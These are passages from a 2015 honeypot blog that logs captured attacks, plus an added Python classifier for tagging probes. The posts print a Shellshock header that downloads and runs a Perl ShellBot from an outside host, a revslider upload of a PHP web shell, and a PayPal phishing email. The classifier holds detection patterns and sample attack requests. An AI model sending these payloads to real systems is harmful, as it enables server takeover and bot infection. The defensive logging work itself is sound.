      "Anonymisation Services": 86,
      "Spam": 100
   },
   "geo": {
      "country": "China",
      "countrycode": "CN"
   },

Sonntag, 30. August 2015

The /tmUnblock.cgi attack

I guess you all know about the /tmUnblock.cgi stuff, as discussed on SANS.
Basically this is all about a Linksys-related vulnerability.

To clean up my vacation logs :-) I will just post the IPs I have seen


Dienstag, 18. August 2015

Open SMTP relay search - gogo@linwayedm.com.tw

I received the following request on all of my honeypots.
BEGIN OF SMTP DATA
177.70.77.242
Country: BR RiskScore: 5.7 Malware: []
uwfdphjcaq@163.com
gogo@linwayedm.com.tw
507
Message-ID: <KUOQLISRUMNOCFSJTHUIL@163.com>
From: "0806" <ltcxjrerz@163.com>
Reply-To: "0806" <darnexinwsq@163.com>
To: gogo@linwayedm.com.tw
Subject: BC_195.169.125.87
Date: Tue, 18 Aug 2015 09:31:21 +0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--585038594152556471"
X-Priority: 3
X-MSMail-Priority: Normal

----585038594152556471
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



----585038594152556471--

END OF DATA
Actually, I think this is pretty nice. The attacker searches for open SMTP relay servers by sending an email to gogo@linwayedm.com.tw with the subject BC_<IPaddress>. So if you have a SPAM honeypot you may want to subscribe :-)


Blacklist Status: BLACKLISTED 5/40
IP Address: 177.70.77.242
Reverse DNS: 242.77.70.177.mksnet.com.br
ASN: Unknown
ASN Owner: Unknown
ISP: Unknown
Continent: South America

Sonntag, 16. August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The Perl script it downloads is identified as
a2.log: Perl.ShellBot-4 FOUND


Blacklist Status: BLACKLISTED 5/40
IP Address: 222.241.151.149
Reverse DNS: Unknown
ASN: AS4134
ASN Owner: Chinanet
ISP: Chinanet Hunan Province Network
Continent: Asia
Country Code: (CN) China
Latitude / Longitude: 28.1792 / 113.114
City: Changsha
Region: Hunan

Donnerstag, 13. August 2015

fiducia.de branded PayPal SPAM - 136.243.226.145

I received two PayPal SPAM emails:

Message-ID: <55CB7A6D.A9A1ACC4@jsany.me>
Date: Wed, 12 Aug 2015 16:55:09 +0200
From: "www.vr.de" <info@jsany.me>
Subject:
 109.234.106.8:25:info@jsany.me:info:"www.vr.de"<info@jsany.me>:nossl::::0:
To: check212016@gmail.com
Content-Type: multipart/mixed;
 boundary="IQEb8Kelq9=_nIw8HiEcGKJxgVtTg4sapX"
MIME-Version: 1.0
X-Mailer: Mozilla 3.04 (WinNT; I)

This is a multi-part message in MIME format
The body of the email reads like a PayPal email:
Hallo lieber PayPal Kunde,
Bitte helfen Sie uns dabei, Ihr Konto wieder in Ordnung zu bringen. Bi=
s dahin haben wir den Zugang zu Ihrem Konto vor=C3=BCbergehend eingesc=
hr=C3=A4nkt.Wo liegt das Problem?Bei Ihrer Kreditkarte sind uns ungew=C3=
=B6hnliche Aktivit=C3=A4ten aufgefallen.Verifizieren Sie sich durch ei=
n Abgleich Ihrer Daten um Ihr Konto wieder Uneingeschr=C3=A4nkt nutzen=
 zu k=C3=B6nnen.Was mache ich jetzt ?

Schritt 1: =C3=96ffnen sie das Formular im Anhang
Schritt 2: Best=C3=A4tigen Sie in Ihrem PayPal-Konto IhreBankdaten
Schritt 3: Verifizieren Sie Ihre Kreditkarte
PayPal Email ID: 6741-9940Viele Gr=C3=BC=C3=9FeIhr Team von PayPal Deu=
tschland522883572783056722171403984794
Attached was a document.html file, which looks like the basic PayPal login form.

You can find the full message and the decoded document on my Drive Share; the password is "spam".

IBM X-Force shows a risk score of 5.7, and the IP is known for SPAM activity.

Sonntag, 9. August 2015

SSTP establishment - 109.234.39.46

BEGIN OF HTTPS DATA:
2015-08-08 14:25:47
Source IP: 109.234.39.46
Country: RU RiskScore: 1 Malware: []
SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
Host: 109.234.106.8
SSTPCORRELATIONID: {5a433238-8781-11e3-b2e4-4e6d617021}
Content-Length: 18446744073709551615
This request reached the HTTPS part of my honeypot yesterday. I am posting this more out of curiosity, as it is the first time I have seen this type of request. A bit of googling led to
https://msdn.microsoft.com/en-us/library/cc247364.aspx, which shows that this is part of a Microsoft Secure Socket Tunneling Protocol (SSTP) initialization.

Blacklist Status: POSSIBLY SAFE 0/40
IP Address: 109.234.39.46
Reverse DNS: server6.com
ASN: AS35415
ASN Owner: WebaZilla B.V.
ISP: McHost.Ru
Continent: Europe
Country Code: (RU) Russian Federation
Latitude / Longitude: 55.75 / 37.6166
City: Unknown
Region: Unknown

Samstag, 8. August 2015

Wordpress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
Received yesterday on my honeypot.
The attack is tailored to WordPress and targets /wp-admin/admin-ajax.php directly. As you can see in the request body, it calls the revslider plugin's update_plugin AJAX action to upload a PHP file, which is itself a minimal upload form.
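The HTTP probes in this and the earlier posts (a Shellshock payload in a request header, the open-proxy check against 24x7-allrequestsallowed.com, and the revslider upload above) can all be tagged from the raw request by one small classifier. This is an added example, not the blog's own tooling; the sample requests and the hostname honeypot.example in it are constructed after the captures in the posts.

```python
"""Tag the probe types this honeypot log shows: Shellshock in a header,
open-proxy checks and WordPress revslider script uploads.  Added example,
not the blog's tooling; samples are constructed after the posts' captures."""
from __future__ import annotations
import re

SHELLSHOCK_RE = re.compile(r"^\s*\(\)\s*\{")       # bash function export "() {"
FILENAME_RE = re.compile(r'filename="([^"]*)"', re.I)
SCRIPT_EXT = (".php", ".phtml", ".php5", ".pl", ".cgi", ".sh")

def parse_request(raw: str) -> tuple[str, str, dict[str, str], str]:
    """Split a raw HTTP request into (method, target, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    method, target = parts[0], (parts[1] if len(parts) > 1 else "")
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def classify_request(raw: str) -> list[str]:
    """Return the probe tags that apply to one request (empty if none)."""
    method, target, headers, body = parse_request(raw)
    tags: list[str] = []
    # Shellshock: a function definition at the start of any header value,
    # which a vulnerable bash parses when the CGI exports the header as env.
    if any(SHELLSHOCK_RE.match(v) for v in headers.values()):
        tags.append("shellshock")
    # Open-proxy check: absolute URI as request-target or a Proxy-Connection
    # header; a forwarding server would fetch the foreign host for the sender.
    if target.lower().startswith(("http://", "https://")) or "proxy-connection" in headers:
        tags.append("open-proxy-probe")
    # Multipart upload whose part filename is a server-side script, plus the
    # revslider update_plugin action the capture above uses to deliver it.
    if method == "POST" and "multipart/form-data" in headers.get("content-type", ""):
        for name in FILENAME_RE.findall(body):
            if name.lower().endswith(SCRIPT_EXT):
                tags.append("script-upload:" + name)
        if "revslider_ajax_action" in body and "update_plugin" in body:
            tags.append("revslider-update_plugin")
    return tags

SAMPLES = {  # constructed after the captures in this blog; hosts are placeholders
    "shellshock": ("GET /phppath/cgi_wrapper HTTP/1.1\r\nHost: honeypot.example\r\n"
                   "User-Agent: () { :;}; /bin/bash -c \"echo 2014 | md5sum\"\r\n\r\n"),
    "proxy": ("GET http://24x7-allrequestsallowed.com/?PHPSESSID=x HTTP/1.1\r\n"
              "Host: 24x7-allrequestsallowed.com\r\nProxy-Connection: Keep-Alive\r\n\r\n"),
    "revslider": ("POST /wp-admin/admin-ajax.php HTTP/1.1\r\nHost: honeypot.example\r\n"
                  "Content-Type: multipart/form-data; boundary=b1\r\n\r\n"
                  "--b1\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nrevslider_ajax_action\r\n"
                  "--b1\r\nContent-Disposition: form-data; name=\"client_action\"\r\n\r\nupdate_plugin\r\n"
                  "--b1\r\nContent-Disposition: form-data; name=\"update_file\"; filename=\"shell.php\"\r\n"
                  "Content-Type: text/html\r\n\r\n<?php /* placeholder */ ?>\r\n--b1--\r\n"),
    "benign": "GET /index.html HTTP/1.1\r\nHost: honeypot.example\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
}
```

Running `classify_request` over each entry in `SAMPLES` yields one tag list per request; the benign request yields an empty list.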

IBM X-Force has no record of this IP.

IPVoid instead:
Blacklist Status: BLACKLISTED 2/40
IP Address: 192.203.127.198
Reverse DNS: Unknown
ASN: AS7018
ASN Owner: AT&T Services, Inc.
ISP: Tuskegee University
Continent: North America
Country Code: (US) United States
Latitude / Longitude: 32.4172 / -85.7191
City: Tuskegee Institute
Region: Alabama